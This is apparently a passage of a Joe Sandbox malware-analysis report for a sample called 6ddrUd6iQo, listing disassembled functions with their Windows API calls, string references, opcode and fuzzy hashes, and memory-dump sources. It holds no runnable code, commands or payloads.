Opcode ID: 7e544d0f72be1d1c3c8524c40feb5d2d756f57bdceaafa2016d81bcdbe77b050
Instruction ID: 01d25c6a3260a188a0fbb1b0a019014844f353b8cb77264bb965f7d41747a944
Opcode Fuzzy Hash: 7e544d0f72be1d1c3c8524c40feb5d2d756f57bdceaafa2016d81bcdbe77b050
Instruction Fuzzy Hash: 07215EB4504309AFDB369F69DC85A9A77B8AF44721F208A19FCA1D72E0E77099508B50

Function 0033710C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F6), ref: 0033712B
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 0033715D
GetStdHandle.KERNEL32(000000F6), ref: 0033716E
CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 003371A8

Strings

nul, xrefs: 003371A3

Memory Dump Source

Source File: 00000000.00000002.1661231308.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1661216216.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000038F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000039C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.00000000003FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661352212.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661367752.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_6ddrUd6iQo.jbxd

Similarity

API ID: CreateHandle$FilePipe
String ID: nul
API String ID: 4209266947-2873401336
Opcode ID: 712abf33d0fedb8b9210bde86e3f0812a5bfef9a6bb5f30a4306e014feca7c4c
Instruction ID: ef460c02ec6bdd08f67eb711a0f19634ca3fbab22a5acac9b059a61dd3d6e8ce
Opcode Fuzzy Hash: 712abf33d0fedb8b9210bde86e3f0812a5bfef9a6bb5f30a4306e014feca7c4c
Instruction Fuzzy Hash: FC21B3B6904309AFDB329F68DC84A9AB7ECAF55720F200A19FCA1D72D0D7709841CB90

Function 0033AEAB Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 0033AEBF
GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 0033AF13
__swprintf.LIBCMT ref: 0033AF2C
SetErrorMode.KERNEL32(00000000,00000001,00000000,0035F910), ref: 0033AF6A

Strings

%lu, xrefs: 0033AF26

Memory Dump Source

Source File: 00000000.00000002.1661231308.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1661216216.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000038F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000039C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.00000000003FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661352212.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661367752.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_6ddrUd6iQo.jbxd

Similarity

API ID: ErrorMode$InformationVolume__swprintf
String ID: %lu
API String ID: 3164766367-685833217
Opcode ID: 31157e70abc81ca1679b74d2cfe8c9eca5e9dd95e0677bfc73b154b9dd97abc9
Instruction ID: 0f791d32ad055651e9c72a79cbee579d7c86b4ecf5977edae82b1671d5366d79
Opcode Fuzzy Hash: 31157e70abc81ca1679b74d2cfe8c9eca5e9dd95e0677bfc73b154b9dd97abc9
Instruction Fuzzy Hash: 3C216030A00609AFCB11EF64CC85EAE7BB8EF49704F004069F909AB361DB71EE41CB61

Function 0032A52F Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 68windowCOMMON

Download Yara Rule

APIs

Part of subcall function 002D7D2C: _memmove.LIBCMT ref: 002D7D66

Part of subcall function 0032A37C: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 0032A399
Part of subcall function 0032A37C: GetWindowThreadProcessId.USER32(?,00000000), ref: 0032A3AC
Part of subcall function 0032A37C: GetCurrentThreadId.KERNEL32 ref: 0032A3B3
Part of subcall function 0032A37C: AttachThreadInput.USER32(00000000), ref: 0032A3BA

GetFocus.USER32 ref: 0032A554

Part of subcall function 0032A3C5: GetParent.USER32(?), ref: 0032A3D3

GetClassNameW.USER32(?,?,00000100), ref: 0032A59D
EnumChildWindows.USER32(?,0032A615), ref: 0032A5C5
__swprintf.LIBCMT ref: 0032A5DF

Strings

%s%d, xrefs: 0032A5D9

Memory Dump Source

Source File: 00000000.00000002.1661231308.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1661216216.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000038F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000039C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.00000000003FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661352212.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661367752.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_6ddrUd6iQo.jbxd

Similarity

API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf_memmove
String ID: %s%d
API String ID: 1941087503-1110647743
Opcode ID: 290624606b8e29ef593f8d384169b5dc6280c5fe90a6dc2e6dc89fc279540b20
Instruction ID: 0933d47b1258f2bd5bfec139b9475045741310c0a9bdabfe735abede7c0efa29
Opcode Fuzzy Hash: 290624606b8e29ef593f8d384169b5dc6280c5fe90a6dc2e6dc89fc279540b20
Instruction Fuzzy Hash: 1411AC75200318ABDF12BF60EC86FEA377DAF48701F0440B6FA08AA192DB7459559B75

Function 00332017 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 49COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 00332048

Strings

KEYS, xrefs: 0033205F
REMOVE, xrefs: 0033204E
EXISTS, xrefs: 00332070
APPEND, xrefs: 00332081

Memory Dump Source

Source File: 00000000.00000002.1661231308.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1661216216.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000038F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000039C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.00000000003FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661352212.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661367752.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_6ddrUd6iQo.jbxd

Similarity

API ID: BuffCharUpper
String ID: APPEND$EXISTS$KEYS$REMOVE
API String ID: 3964851224-769500911
Opcode ID: e45097c68cbd32e643a44e70f15751eaddca05b39a22b9a6847bda6b4a23a50f
Instruction ID: 82d3acfe4495f4cd305c0ab7312b5f691a48612faba66d20ae1d014470cdbf6c
Opcode Fuzzy Hash: e45097c68cbd32e643a44e70f15751eaddca05b39a22b9a6847bda6b4a23a50f
Instruction Fuzzy Hash: 951139349102198FCF15EFA4D8914BEB7B4FF1A304F1084A9D955A7262EB32691ACF50

Function 00348F5B Relevance: 7.9, APIs: 5, Instructions: 438COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(?,?,00000104,?,0035F910), ref: 0034903D
FreeLibrary.KERNEL32(00000000,00000001,00000000,?,0035F910), ref: 00349071
QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 003491EB
SysFreeString.OLEAUT32(?), ref: 00349215

Memory Dump Source

Source File: 00000000.00000002.1661231308.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1661216216.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000038F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000039C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.00000000003FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661352212.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661367752.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_6ddrUd6iQo.jbxd

Similarity

API ID: Free$FileLibraryModuleNamePathQueryStringType
String ID:
API String ID: 560350794-0
Opcode ID: dfe79ca1889b7b861570bbec798661e0aa1a4740d338db2f955fdb6625157b95
Instruction ID: 9258bfc0996a3ddc272339d17025ea9028edfca3fdee570c12d01a73487d9712
Opcode Fuzzy Hash: dfe79ca1889b7b861570bbec798661e0aa1a4740d338db2f955fdb6625157b95
Instruction Fuzzy Hash: ABF11875A00209EFCB05DF94C888EAEB7B9FF49315F11805AF515AF290CB31AE45CB50

Function 0034EE69 Relevance: 7.7, APIs: 5, Instructions: 247COMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0034EF1B
GetProcessIoCounters.KERNEL32(00000000,?), ref: 0034EF4B
GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 0034F07E
CloseHandle.KERNEL32(?), ref: 0034F0FF

Memory Dump Source

Source File: 00000000.00000002.1661231308.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1661216216.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000038F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000039C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.00000000003FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661352212.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661367752.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_6ddrUd6iQo.jbxd

Similarity

API ID: Process$CloseCountersHandleInfoMemoryOpen
String ID:
API String ID: 2364364464-0
Opcode ID: ef89de83d41097facfb55c4785fe1e547ae72a8bc1f2a7f10d588c3b582666e3
Instruction ID: 3153bb8c6a5571a6fc7dd9d1ab50769ca279184c6b508aaec39a3b8ded8bd8aa
Opcode Fuzzy Hash: ef89de83d41097facfb55c4785fe1e547ae72a8bc1f2a7f10d588c3b582666e3
Instruction Fuzzy Hash: F28161716143119FD721EF28C886F2AB7E5AF88720F15881EF599DB392DB70AC508F51

Function 003502C2 Relevance: 7.6, APIs: 5, Instructions: 144registryCOMMON

Download Yara Rule

APIs

Part of subcall function 002D7F41: _memmove.LIBCMT ref: 002D7F82

Part of subcall function 003510A5: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00350038,?,?), ref: 003510BC

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00350388
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 003503C7
RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 0035040E
RegCloseKey.ADVAPI32(?,?), ref: 0035043A
RegCloseKey.ADVAPI32(00000000), ref: 00350447

Memory Dump Source

Source File: 00000000.00000002.1661231308.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1661216216.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000038F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000039C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.00000000003FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661352212.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661367752.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_6ddrUd6iQo.jbxd

Similarity

API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
String ID:
API String ID: 3440857362-0
Opcode ID: dfc6fa16d467f6c8a25322180b0a74025efd5d6f246a6ad121e681e0193e37b7
Instruction ID: bcafc490660130966c5d7cbea8c8ff8b4315a59e7be5a803f57cab18d82eec37
Opcode Fuzzy Hash: dfc6fa16d467f6c8a25322180b0a74025efd5d6f246a6ad121e681e0193e37b7
Instruction Fuzzy Hash: 77514871218244AFD705EF64D881F6EB7E8BF84305F44892EB9958B2A1DB31ED08CB52

Function 0033E7DC Relevance: 7.6, APIs: 5, Instructions: 135COMMON

Download Yara Rule

APIs

GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 0033E88A
GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 0033E8B3
WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 0033E8F2

Part of subcall function 002D9997: __itow.LIBCMT ref: 002D99C2
Part of subcall function 002D9997: __swprintf.LIBCMT ref: 002D9A0C

WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 0033E917
WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 0033E91F

Memory Dump Source

Source File: 00000000.00000002.1661231308.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1661216216.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000038F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000039C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.00000000003FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661352212.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661367752.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_6ddrUd6iQo.jbxd

Similarity

API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
String ID:
API String ID: 1389676194-0
Opcode ID: bb5ddf8b39383fc1a586ae320640ddb115892eb7192fbc1ffd9402f8ecee9f2d
Instruction ID: 4937819e0f948b244564c1bbb435f29fced3c426f8051ac59d14b3008e8f8722
Opcode Fuzzy Hash: bb5ddf8b39383fc1a586ae320640ddb115892eb7192fbc1ffd9402f8ecee9f2d
Instruction Fuzzy Hash: 3D51F975A10215EFCB01EF64C991AAEBBF5EF08310F1480A9F949AB361CB31AD51DF50

Function 0035A2C5 Relevance: 7.6, APIs: 5, Instructions: 130COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1661231308.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1661216216.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000038F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000039C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.00000000003FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661352212.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661367752.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_6ddrUd6iQo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 64c233af8e82478386eb27fa70dceb39e6a3937563b99ab15b02aaa2025bba73
Instruction ID: 2bb95653036d296b01f23bbbb87e57b5a81c6a03f432b75a63f71c1243141bde
Opcode Fuzzy Hash: 64c233af8e82478386eb27fa70dceb39e6a3937563b99ab15b02aaa2025bba73
Instruction Fuzzy Hash: 7C412739900604AFC712DF68CC48FA9BBA8FB09352F160365FC55A72F0D770AE49EA51

Function 002D2344 Relevance: 7.6, APIs: 5, Instructions: 111keyboardCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 002D2357
ScreenToClient.USER32(003967B0,?), ref: 002D2374
GetAsyncKeyState.USER32(00000001), ref: 002D2399
GetAsyncKeyState.USER32(00000002), ref: 002D23A7

Memory Dump Source

Source File: 00000000.00000002.1661231308.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1661216216.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000038F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000039C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.00000000003FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661352212.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661367752.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_6ddrUd6iQo.jbxd

Similarity

API ID: AsyncState$ClientCursorScreen
String ID:
API String ID: 4210589936-0
Opcode ID: be2b738a61b8967eec77690588e42ac8cc6cf992a61fff2f7e87ea9928a19b0e
Instruction ID: 86d2ffd4617fec03f61b4a09650d32b7152042a3292e5270aa6c4220583882e3
Opcode Fuzzy Hash: be2b738a61b8967eec77690588e42ac8cc6cf992a61fff2f7e87ea9928a19b0e
Instruction Fuzzy Hash: BB418E35514119FBDF169F68C844AE9BB78FB05360F20439AF828A62E0C7745DA8DB91

Function 00326920 Relevance: 7.6, APIs: 5, Instructions: 97windowCOMMON

Download Yara Rule

APIs

PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0032695D
TranslateAcceleratorW.USER32(?,?,?), ref: 003269A9
TranslateMessage.USER32(?), ref: 003269D2
DispatchMessageW.USER32(?), ref: 003269DC
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 003269EB

Memory Dump Source

Source File: 00000000.00000002.1661231308.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1661216216.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000038F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000039C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.00000000003FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661352212.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661367752.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_6ddrUd6iQo.jbxd

Similarity

API ID: Message$PeekTranslate$AcceleratorDispatch
String ID:
API String ID: 2108273632-0
Opcode ID: bf34dbfc0a31ce5c4737d694fee94a2a5a60f306c81dd67180693e6783fb35f5
Instruction ID: bf436ac64044fba6146a06837e26d28437964b33b9e345c866cb149169dd6a91
Opcode Fuzzy Hash: bf34dbfc0a31ce5c4737d694fee94a2a5a60f306c81dd67180693e6783fb35f5
Instruction Fuzzy Hash: 1131C371901266AFDB23CF74EC86FB67BACAF01304F15456AE421D31A1DB35D885D790

Function 00328F01 Relevance: 7.6, APIs: 5, Instructions: 89sleepwindowCOMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 00328F12
PostMessageW.USER32(?,00000201,00000001), ref: 00328FBC
Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 00328FC4
PostMessageW.USER32(?,00000202,00000000), ref: 00328FD2
Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 00328FDA

Memory Dump Source

Source File: 00000000.00000002.1661231308.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1661216216.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000038F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000039C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.00000000003FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661352212.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661367752.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_6ddrUd6iQo.jbxd

Similarity

API ID: MessagePostSleep$RectWindow
String ID:
API String ID: 3382505437-0
Opcode ID: 3a6935ac50c3fe99cf3b5bb28379b93b7d4119191154a6c1194911bb91299079
Instruction ID: 0a9b80f9e8e5978214c19bdd4f0d2437f6b44e60ddb13b999bcc8d442050c6d2
Opcode Fuzzy Hash: 3a6935ac50c3fe99cf3b5bb28379b93b7d4119191154a6c1194911bb91299079
Instruction Fuzzy Hash: 3931CE71501229EFDB15CF68EA4CA9E7BBAEB04316F114229F925EB1E0C7B09914DB90

Function 0032B6AF Relevance: 7.6, APIs: 5, Instructions: 88windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 0032B6C7
SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 0032B6E4
SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 0032B71C
CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 0032B742
_wcsstr.LIBCMT ref: 0032B74C

Memory Dump Source

Source File: 00000000.00000002.1661231308.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1661216216.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000038F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000039C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.00000000003FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661352212.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661367752.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_6ddrUd6iQo.jbxd

Similarity

API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
String ID:
API String ID: 3902887630-0
Opcode ID: 6d352433c190cbbb33e09b9f4d22d76c87bc5c824771c88a593b0076c297e888
Instruction ID: 1140796f9d7922aab7dc703e237490a429aa5091aa753a3347a32b8e92d4adff
Opcode Fuzzy Hash: 6d352433c190cbbb33e09b9f4d22d76c87bc5c824771c88a593b0076c297e888
Instruction Fuzzy Hash: 3D212632204214BBEB265B39EC49E7BFBACDF89760F014039FD05CA1A1EF61DC5096A0

Function 0035B405 Relevance: 7.6, APIs: 5, Instructions: 85COMMON

Download Yara Rule

APIs

Part of subcall function 002D2612: GetWindowLongW.USER32(?,000000EB), ref: 002D2623

GetWindowLongW.USER32(?,000000F0), ref: 0035B44C
SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 0035B471
SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 0035B489
GetSystemMetrics.USER32(00000004), ref: 0035B4B2
SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,00341184,00000000), ref: 0035B4D0

Memory Dump Source

Source File: 00000000.00000002.1661231308.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1661216216.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000038F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000039C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.00000000003FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661352212.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661367752.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_6ddrUd6iQo.jbxd

Similarity

API ID: Window$Long$MetricsSystem
String ID:
API String ID: 2294984445-0
Opcode ID: 3440c35f2cf84acaeb4996f6a81249be64240ccc8ce52a67dc6539937fcc3abc
Instruction ID: f874a6c5dc523e4ea6b0a0a454989b26f3b1075e695f30a8b9cb22499c97f371
Opcode Fuzzy Hash: 3440c35f2cf84acaeb4996f6a81249be64240ccc8ce52a67dc6539937fcc3abc
Instruction Fuzzy Hash: D82194B1514255AFCB229F3ACC44E6AB7A8EB05762F124739FD26C71F1E7309814DB90

Function 003297E9 Relevance: 7.6, APIs: 5, Instructions: 84windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00329802

Part of subcall function 002D7D2C: _memmove.LIBCMT ref: 002D7D66

SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00329834
__itow.LIBCMT ref: 0032984C
SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00329874
__itow.LIBCMT ref: 00329885

Memory Dump Source

Source File: 00000000.00000002.1661231308.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1661216216.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000038F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000039C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.00000000003FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661352212.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661367752.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_6ddrUd6iQo.jbxd

Similarity

API ID: MessageSend$__itow$_memmove
String ID:
API String ID: 2983881199-0
Opcode ID: 919da5d966246e80a828f862492835373f17830b80dca7a3898d5684bfd08d29
Instruction ID: d1e2de3d84842584e714955f83b1d73fb5ffd6f4101a2cb699c58cd2bf6ad0de
Opcode Fuzzy Hash: 919da5d966246e80a828f862492835373f17830b80dca7a3898d5684bfd08d29
Instruction Fuzzy Hash: 7921D771B00318AFDB12AA659C86FEE7BADEF5A710F084036FD04DB251E7709D458B91

